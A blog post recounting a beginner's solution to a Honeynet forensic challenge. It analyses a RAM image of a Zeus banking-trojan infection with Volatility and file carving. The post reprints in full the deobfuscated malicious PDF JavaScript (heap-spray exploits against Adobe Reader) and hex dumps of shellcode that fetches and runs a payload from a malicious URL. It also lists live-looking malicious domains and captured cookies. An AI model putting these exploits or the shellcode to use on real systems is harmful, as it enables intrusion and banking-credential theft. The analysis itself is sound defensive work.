среда, 28 апреля 2010 г.

The life and adventures of Bobinson Vmemo (heck, just call’em Bob)

About two weeks ago I returned from the excellent Digital Forensics training in Vienna and was eager to test the acquired skills on some live material. When browsing the Honeynet project site I discovered exactly what I needed – Forensic Challenge part 3 – Banking troubles

This post is to describe my approach to that challenge, tools I used and some very dumb mistakes you should not commit after reading it). Nothing sensational, but it maybe helpful to someone just starting his work in digital foremnsics and malware analysis field (like me).

All the tools used below are, for my knowledge, free for personal use and mostly open-source.

Deadline to submit results has passed on April 26, so any further disclosure is completely legit (though you don’t read any further if you want crack this exercise yourself).

So I downloaded the exercise image, fired up the VirtualBox machine with CAINE – excellent set of forensic tools wrapped in Linux LiveCD (which comes handy when analyzing malware – you know, for kids).

So the image is unzipped, loaded in CAINE’s main interface and… fsstat FAIL. OK, maybe I should set the offset, 63 maybe? Nope, still no luck. Maybe Autopsy? The image has loaded and keyword search gave some results, but no partitions discovered, so still no-go. Hmm, let’s review the challenge intro…

Yep, it is RAM image, not HDD image (and yes, now I know I should read the challenge description first, maybe two times in a row). Don’t know any tools to analyze RAM images but Mommy taught me how to google so… download Volatility.

Good thing is that CAINE already has Python included, so I just unzipped it and jumped straight into action:

Let’s check what processes are running

root@caine:python volatility procscan2 –f /path/to/image/hn_forensics >processes.txt

and where do they connect

root@caine:python volatility connscan2 –f /path/to/image/hn_forensics >connections.txt

And what do we see:

Local Address Remote Address Pid

------------------------- ------------------------- ------

192.168.0.176:1176 212.150.164.203:80 888

192.168.0.176:1189 192.168.0.1:9393 1244

192.168.0.176:2869 192.168.0.1:30379 1244

192.168.0.176:2869 192.168.0.1:30380 4

0.0.0.0:0 80.206.204.129:0 0

127.0.0.1:1168 127.0.0.1:1169 888

192.168.0.176:1172 66.249.91.104:80 888

127.0.0.1:1169 127.0.0.1:1168 888

192.168.0.176:1171 66.249.90.104:80 888

192.168.0.176:1178 212.150.164.203:80 1752

192.168.0.176:1184 193.104.22.71:80 880

192.168.0.176:1185 193.104.22.71:80 880

192.168.0.176 is, apparently, the victim’s address, 192.168.0.1 is network gateway (at least, so I guess), 66.249.90.104 is Google.

And everything else is VERY interesting:

Date (UTC)

Domain

IP

Reverse Lookup

Description

Registrant

ASN

2010/02/26_18:04

search-network-plus.com/

212.150.164.203

-

YES exploit kit

Antonio Perino antonioperinom@yahoo.com

1680

2010/02/26_18:04

search-network-plus.com/admin/

212.150.164.203

-

control panel of YES exploit kit

Antonio Perino antonioperinom@yahoo.com

1680

2010/02/26_18:04

search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0

212.150.164.203

-

pdf exploit

Antonio Perino antonioperinom@yahoo.com

1680

2010/02/26_18:04

search-network-plus.com/load.php?a=a&e=1

212.150.164.203

-

zeus v2 trojan

Antonio Perino antonioperinom@yahoo.com

1680

Date (UTC)

Domain

IP

Reverse Lookup

Description

Registrant

ASN

2010/02/26_18:04

-

193.104.22.71/~produkt/9j856f_4m9y8urb.php

-

zeus v2 drop zone

-

34305

2010/02/26_18:04

-

193.104.22.71/~produkt/983745213424/34650798253

-

zeus v2 config file

-

34305

2010/01/02_07:15

excellenthostingservice.com/dkir8445g.php

193.104.22.71

-

zeus v2 drop zone

Andrey Zubkov / xm@qx8.ru

34305

2009/12/27_11:46

excellenthostingservice.com/jugd63885.exe

193.104.22.71

-

zeus v2 trojan

Andrey Zubkov / xm@qx8.ru

34305

2009/12/27_11:46

excellenthostingservice.com/kdfjhguv45yt5.bin

193.104.22.71

-

zeus v2 config file

Andrey Zubkov / xm@qx8.ru

34305

copyright © 2009 www.malwaredomainlist.com

Looks like someone got himself thunderbolted;)

OK, now what processes do connect to these nasty places?

Not surprisingly, there are:

1752 888 Sat Feb 27 20:12:23 2010 0x02261ac8 0x04040300 AcroRd32.exe

888 1756 Sat Feb 27 20:11:53 2010 0x02268220 0x04040380 firefox.exe

(Acrobat Reader is child of Firefox, which tells us, considering also the briefing, that infection vector was likely a malicious PDF downloaded from the Intertubes) and last but not least

880 688 Fri Feb 26 03:34:07 2010 0x02466a70 0x040400e0 svchost.exe

Lets dump’em down!

root@caine:python volatility procdump –f /path/to/image/hn_forensics –p 1752

volatility: error: Unable to load image. Possible causes: invalid dtb, wrong image type, unsupported image type.

Uh-oh. Same with other processes. So, what image type exactly you don’t like?

root@caine:python volatility ident –f /path/to/image/hn_forensics

IMAGE NAME: /path/to/image/hn_forensics

IMAGE TYPE: UNKNOWN

What do you mean, UNKNOWN?

[…Skipped 2 days of googling, examining the image with hex/binary editor, googling again, downloading and applying countless tools, more googling, finally stumbling upon the image in CAINE file explorer which indicated hn_forensics is actually a tar file]

Enter Bob.vmem

Finally, executables are dumped and sent straight to VirusTotal. 0/40 (actually, svchost.exe got one hit from some obscure CAT AV, but lets count it as false positive). What next?

Maybe, something interesting is in processes memories?

root@caine:python volatility memdmp –f /path/to/image/Bob.vmem –p pid

Now, just opening this dumps in hex/binary editor gives some useful results: you can determine machine and user name (which is Administrator, ah so unwise of you, Bob!), environment variables etc.

And a bit more (here are just some sample strings I found):

Acrord32 (1752)

GET /~produkt/983745213424/34650798253 HTTP/1.1

Accept: */*

Connection: Close

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: 193.104.22.71 (familiar address, heh?)

Pragma: no-cache

w-form-urlencoded

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: activex.microsoft.com

Content-Length: 73

Connection: Keep-Alive

Cache-Control: no-cache

MIMETYPE=application/x-silverlight-2&CLSID=application_2F_x-silverlight-2

http://193.104.22.71/~produkt/9j856f_4m9y8urb.php (looks totally benign to me!)

115f8a6b Host: 193.104.22.71

159f5529 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

POST /~produkt/9j856f_4m9y8urb.php HTTP/1.1.

http://193.104.22.71/~produkt/9j856f_4m9y8urb.php

1a80cf51 A V I R A 2 1 0 8

1b11a53f http://193.104.22.71/~produkt/69825439870/73846525#

http://193.104.22.71/~produkt/9j856f_4m9y8urb.php&

1b11a5c7 !*.microsoft.com/

http:/ m\Uffffffff\Uffffffffspac

?odnoklassniki. (Bob, someone misses you in Russia)

vko3kte@*/logi

COMPUTERNAME=BOB-DCADFEDC55C

urlmon.dll ObtainUserAgentString

https://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome

ACustomerServiceMenuEntryPoint?custAction=75

GRABBED TAN

pass

ASKIPPED TAN:

Cookies:

Path: atdmt.com/

MUID=94FE735020664E66A3C9C9D5F41F5B6F

Path: rad.msn.com/

FC00=FB=

FC01=FB=

FC02=FB=

FC03=FB=

FC04=FB=

FC05=FB=

FC06=FB=

FC07=FB=

FC08=FB=

Path: ad.wsod.com/

u_1=4b87435bc9aef

Path: google.com/

PREF=ID=05cbfa879c788048:U=6d9c1ca8f172cf34:TM=1267155808:LM=1267155821:S=HPq9qDiZCOp14r3Q

Path: kontera.com/

cluid=-8245845131267300210411

Path: questionmarket.com/

CS1=707381-23-1

Path: msn.com/

MC1=V=3&GUID=2896b15715de4227be7aa457546a3447

mh=MSFT

CC=US

CULTURE=EN-US

MUID=94FE735020664E66A3C9C9D5F41F5B6F

Path: www.msn.com/

hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F

hpcli=W.H|L.|S.|R.|U.L|C.|H.

ushpwea=wc:USNY1232

wpv=2

Path: oldversion.com/

__utma=183186040.157986524.1267155813.1267155813.1267300204.2

__utmz=183186040.1267300204.2.2.utmccn=(organic)|utmcsr=google|utmctr=old+software|utmcmd=organi

https://banking.dee/cgi/ueberweisu

Registered email address*

onClick="javascript:handlePageLink('/internetBanking/RequestRouter?requestCmdId=AccountDetails

Account Name

account-history-wait.jsp" method="post">

id="dgDepositAcctsheader0"*>

You betcha there are some banking troubles!

OK, now we know what are the tricks, but who is playing them? It would be very helpful to take a look at that malicious PDF… Assuming it is in memory (and the briefing strongly hints at that), how can we find it?

Of course, you can dig up PDF format specification and search for headers/footers in dump manually, but isn’t it so 90’s?

One of CAINE’s most useful utilities is FOREMOST – file carving tool that will search the image for all files of some type (executables, web pages, multimedia etc.) by their headers/footers. It is originally intended to be applied to HDD images, but I doesn’t hurt to try on process RAM dump:

root@caine: foremost –t pdf –i /path/to/image/1752.dmp –o 1752

You actually can scan for several or even all types of files, but it takes loads of time and HDD space (there are many false positives like 70 MB gif images and so on) so let’s just stick to pdf for now.

In output folder we have 7 pdf files, 5 of them are slightly more then 400 bytes long (likely FP) and two others are ~60 and ~600 KB, and former is encrypted. Virustotalling gives 0/40 for first and 15/40 for second. Looks like we have a hit.

Now, how can we determine, what vulnerability was exploited and what is the payload? I could just transfer the pdf to windows machine and launch it, but somehow I felt uneasy about it ;). So googling directed me to Didier Stevens blog, which hosts the tools to extract objects (including malware scripts) from PDF files and a screencast on how to use them.

Following screencast instructions I extracted the (probably) malicious Javascript that looked like this:

var xtdxJYVm='0111…<22>…';function yRgjvasM(EajhtdGQ,replace,RzUbJqHU){if(!(replace instanceof Array)){replace=new Array(replace);if(EajhtdGQ instanceof Array){while(EajhtdGQ.length>replace.length){replace[replace.length]=replace[0];}}}if(!(EajhtdGQ instanceof Array))EajhtdGQ=new Array(EajhtdGQ);while(EajhtdGQ.length>replace.length){replace[replace.length]='';}if(RzUbJqHU instanceof Array){for(WsvDXhZg in RzUbJqHU){RzUbJqHU[WsvDXhZg]=yRgjvasM(EajhtdGQ,replace,RzUbJqHU[WsvDXhZg]);}return RzUbJqHU;}for(var WsvDXhZg=0;WsvDXhZg-1){RzUbJqHU=RzUbJqHU.replace(EajhtdGQ[WsvDXhZg],replace[WsvDXhZg]);GlyomGyU=RzUbJqHU.indexOf(EajhtdGQ[WsvDXhZg],GlyomGyU);}}return RzUbJqHU;}function DgZCVgIX(xtdxJYVm){var VzBJVOyp=0,GlyomGyU=0,qTABhyTE;for(;GlyomGyU<8;glyomgyu++){qtabhyte=7-glyomgyu;vzbjvoyp+=dqakslkn(2,qtabhyte)*xtdxjyvm[glyomgyu];}return glyomgyu="0;var" vzbjvoyp="'';while(GlyomGyU

After some testing in Spidermonkey and adding a } in the end, I submitted it to Wepawet for anlysis.

Deobfuscation result was marked as benign (yes, I believe… believe you are lying!) and looked just a bit less… well, obfuscated:

function OzWJi(rzRoI, fxLUb){

while (rzRoI.length * 2 <>

rzRoI += rzRoI;

}

return rzRoI.substring(0, fxLUb / 2);

}

function bSuTN(){

var Uueqk = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u323D\u0000%25%30%25%30%25%30%25%30%25%30%25%30");

var HWXsi = 202116108;

var ZkzwV = [];

var HsVTm = 4194304;

var EgAxi = Uueqk.length * 2;

var fxLUb = HsVTm - (EgAxi + 0x38);

var rzRoI = sly("\u9090\u9090");

rzRoI = OzWJi(rzRoI, fxLUb);

var tfFQG = (HWXsi - 4194304) / HsVTm;

for (var gtqHE = 0; gtqHE <>

ZkzwV[gtqHE] = rzRoI + Uueqk;

}

var eHmqR = sly("\u0c0c\u0c0c");

while (eHmqR.length <>

this .collabStore = Collab.collectEmailInfo({

subj : "", msg : eHmqR

}

);

}

function Soy(){

var dwl = new Array();

function ppu(BtM, dqO){

while (BtM.length * 2 <>

BtM += BtM;

}

BtM = BtM.substring(0, dqO / 2);

return BtM;

}

XrS = 0x30303030;

HRb = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u313D\u0000\u0000%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26");

var jxU = 4194304;

var RaR = HRb.length * 2;

var dqO = jxU - (RaR + 0x38);

var BtM = sly("\u9090\u9090");

BtM = ppu(BtM, dqO);

var JYD = (XrS - 4194304) / jxU;

for (var Prn = 0; Prn <>

dwl[Prn] = BtM + HRb;

}

var IdI = "66055447950636260127";

for (sly = 0; sly <>

IdI += "3";

}

util.printf("%45000f", IdI);

}

function ynu(shG){

shG = shG.replace(/[\+1]/g, "0");

shG = shG.replace(/[\+2]/g, "9");

shG = shG.replace(/[\+3]/g, "8");

shG = shG.replace(/[\+4]/g, "7");

shG = shG.replace(/[\+5]/g, "6");

shG = shG.replace(/[\+6]/g, "5");

shG = shG.replace(/[\+7]/g, "4");

shG = shG.replace(/[\+8]/g, "3");

shG = shG.replace(/[\+9]/g, "2");

shG = shG.replace(/[\+0]/g, "1");

return shG;

}

function XiIHG(){

var cqcNr = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u333D\u0000\u1334\u1334");

dPl = sly("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090") + cqcNr;

FQI = sly("\u9090\u9090");

fhT = 5 * 2;

sLa = fhT + dPl.length;

while (FQI.length <>

NJn = FQI.substring(0, sLa);

eUq = FQI.substring(0, FQI.length - sLa);

while (eUq.length + sLa < euq =" eUq">

Cwy = [];

for (XWT = 0; XWT <>

var kKG = 4012;

var LwZ = Array(kKG);

for (XWT = 0; XWT <>

LwZ[XWT] = sly("\u000a\u000a\u000a\u000a");

}

Collab.getIcon(LwZ + "_N.bundle");

}

var sly = unescape, ZgA = app.viewerVersion.toString(), TjP = this ;

if (ZgA <>

bSuTN();

}

if (ZgA >= 8 && ZgA <>

Soy();

}

if (ZgA <= 9){

XiIHG();

}

What next? Yes, submit it to Wepawet again J

And…

Detection results

Detector

Result

Jsand 1.02.02

suspicious

Exploits

No exploits were identified.

Deobfuscation results

Evals

No evals.

Writes

No writes.

Network Activity

ActiveX controls

No objects/controls.

Shellcode and Malware

Hexadecimal

ASCII

33 c0 64 8b 40 30 78 0c  8b 40 0c 8b 70 1c ad 8b 
58 08 eb 09 8b 40 34 8d  40 7c 8b 58 3c 6a 44 5a 
d1 e2 2b e2 8b ec eb 4f  5a 52 83 ea 56 89 55 04 
56 57 8b 73 3c 8b 74 33  78 03 f3 56 8b 76 20 03 
f3 33 c9 49 50 41 ad 33  ff 36 0f be 14 03 38 f2 
74 08 c1 cf 0d 03 fa 40  eb ef 58 3b f8 75 e5 5e 
8b 46 24 03 c3 66 8b 0c  48 8b 56 1c 03 d3 8b 04 
8a 03 c3 5f 5e 50 c3 8d  7d 08 57 52 b8 33 ca 8a 
5b e8 a2 ff ff ff 32 c0  8b f7 f2 ae 4f b8 65 2e 
65 78 ab 66 98 66 ab b0  6c 8a e0 98 50 68 6f 6e 
2e 64 68 75 72 6c 6d 54  b8 8e 4e 0e ec ff 55 04 
93 50 33 c0 50 50 56 8b  55 04 83 c2 7f 83 c2 31 
52 50 b8 36 1a 2f 70 ff  55 04 5b 33 ff 57 56 b8 
98 fe 8a 0e ff 55 04 57  b8 ef ce e0 60 ff 55 04 
68 74 74 70 3a 2f 2f 73  65 61 72 63 68 2d 6e 65 
74 77 6f 72 6b 2d 70 6c  75 73 2e 63 6f 6d 2f 6c 
6f 61 64 2e 70 68 70 3f  61 3d 61 26 73 74 3d 49 
6e 74 65 72 6e 65 74 20  45 78 70 6c 6f 72 65 72 
20 36 2e 30 26 65 3d 32  00 00 25 00 30 00 25 00 
30 00 25 00 30 00 25 00  30 00 25 00 30 00 25 00 
30 00 
3.d.@0x..@..p...
X....@4.@|.X
..+....OZR..V.U.
VW.s<.t3x..V.v .
.3.IPA.3.6....8.
t......@..X;.u.^
.F$..f..H.V.....
..._^P..}.WR.3..
[.....2.....O.e.
ex.f.f..l...Phon
.dhurlmT..N...U.
.P3.PPV.U......1
RP.6./p.U.[3.WV.
.....U.W....`.U.
http://search-ne
twork-plus.com/l
oad.php?a=a&st=I
nternet Explorer
 6.0&e=2..%.0.%.
0.%.0.%.0.%.0.%.
0.
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90 
33 c0 64 8b 40 30 78 0c  8b 40 0c 8b 70 1c ad 8b 
58 08 eb 09 8b 40 34 8d  40 7c 8b 58 3c 6a 44 5a 
d1 e2 2b e2 8b ec eb 4f  5a 52 83 ea 56 89 55 04 
56 57 8b 73 3c 8b 74 33  78 03 f3 56 8b 76 20 03 
f3 33 c9 49 50 41 ad 33  ff 36 0f be 14 03 38 f2 
74 08 c1 cf 0d 03 fa 40  eb ef 58 3b f8 75 e5 5e 
8b 46 24 03 c3 66 8b 0c  48 8b 56 1c 03 d3 8b 04 
8a 03 c3 5f 5e 50 c3 8d  7d 08 57 52 b8 33 ca 8a 
5b e8 a2 ff ff ff 32 c0  8b f7 f2 ae 4f b8 65 2e 
65 78 ab 66 98 66 ab b0  6c 8a e0 98 50 68 6f 6e 
2e 64 68 75 72 6c 6d 54  b8 8e 4e 0e ec ff 55 04 
93 50 33 c0 50 50 56 8b  55 04 83 c2 7f 83 c2 31 
52 50 b8 36 1a 2f 70 ff  55 04 5b 33 ff 57 56 b8 
98 fe 8a 0e ff 55 04 57  b8 ef ce e0 60 ff 55 04 
68 74 74 70 3a 2f 2f 73  65 61 72 63 68 2d 6e 65 
74 77 6f 72 6b 2d 70 6c  75 73 2e 63 6f 6d 2f 6c 
6f 61 64 2e 70 68 70 3f  61 3d 61 26 73 74 3d 49 
6e 74 65 72 6e 65 74 20  45 78 70 6c 6f 72 65 72 
20 36 2e 30 26 65 3d 33  00 00 34 13 34 13 
................
................
................
................
................
................
................
................
................
................
3.d.@0x..@..p...
X....@4.@|.X
..+....OZR..V.U.
VW.s<.t3x..V.v .
.3.IPA.3.6....8.
t......@..X;.u.^
.F$..f..H.V.....
..._^P..}.WR.3..
[.....2.....O.e.
ex.f.f..l...Phon
.dhurlmT..N...U.
.P3.PPV.U......1
RP.6./p.U.[3.WV.
.....U.W....`.U.
http://search-ne
twork-plus.com/l
oad.php?a=a&st=I
nternet Explorer
 6.0&e=3..4.4.
33 c0 64 8b 40 30 78 0c  8b 40 0c 8b 70 1c ad 8b 
58 08 eb 09 8b 40 34 8d  40 7c 8b 58 3c 6a 44 5a 
d1 e2 2b e2 8b ec eb 4f  5a 52 83 ea 56 89 55 04 
56 57 8b 73 3c 8b 74 33  78 03 f3 56 8b 76 20 03 
f3 33 c9 49 50 41 ad 33  ff 36 0f be 14 03 38 f2 
74 08 c1 cf 0d 03 fa 40  eb ef 58 3b f8 75 e5 5e 
8b 46 24 03 c3 66 8b 0c  48 8b 56 1c 03 d3 8b 04 
8a 03 c3 5f 5e 50 c3 8d  7d 08 57 52 b8 33 ca 8a 
5b e8 a2 ff ff ff 32 c0  8b f7 f2 ae 4f b8 65 2e 
65 78 ab 66 98 66 ab b0  6c 8a e0 98 50 68 6f 6e 
2e 64 68 75 72 6c 6d 54  b8 8e 4e 0e ec ff 55 04 
93 50 33 c0 50 50 56 8b  55 04 83 c2 7f 83 c2 31 
52 50 b8 36 1a 2f 70 ff  55 04 5b 33 ff 57 56 b8 
98 fe 8a 0e ff 55 04 57  b8 ef ce e0 60 ff 55 04 
68 74 74 70 3a 2f 2f 73  65 61 72 63 68 2d 6e 65 
74 77 6f 72 6b 2d 70 6c  75 73 2e 63 6f 6d 2f 6c 
6f 61 64 2e 70 68 70 3f  61 3d 61 26 73 74 3d 49 
6e 74 65 72 6e 65 74 20  45 78 70 6c 6f 72 65 72 
20 36 2e 30 26 65 3d 31  00 00 00 00 23 00 26 00 
23 00 26 00 23 00 26 00  23 00 26 00 23 00 26 00 
23 00 26 00 23 00 26 00  23 00 26 00 23 00 26 00 
23 00 26 00 
3.d.@0x..@..p...
X....@4.@|.X
..+....OZR..V.U.
VW.s<.t3x..V.v .
.3.IPA.3.6....8.
t......@..X;.u.^
.F$..f..H.V.....
..._^P..}.WR.3..
[.....2.....O.e.
ex.f.f..l...Phon
.dhurlmT..N...U.
.P3.PPV.U......1
RP.6./p.U.[3.WV.
.....U.W....`.U.
http://search-ne
twork-plus.com/l
oad.php?a=a&st=I
nternet Explorer
 6.0&e=1....#.&.
#.&.#.&.#.&.#.&.
#.&.#.&.#.&.#.&.
#.&.

Additional (potential) malware:

URL

Type

Hash

Analysis

http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=1

N/A

N/A

http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2

N/A

N/A

http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=3

N/A

N/A

DING-DING-DING! JACKPOT!!!

We got deobfuscated shellcode and payload URLs. That’s pretty much everything we need for now. Of course, you should also review what files and registry entries are created and investigate into the service apparently created by malware (remember that svchost.exe?) but that is pretty straightforward using Volatility and you can figure it out yourself.

Hope this was an amusing story or at least helpful.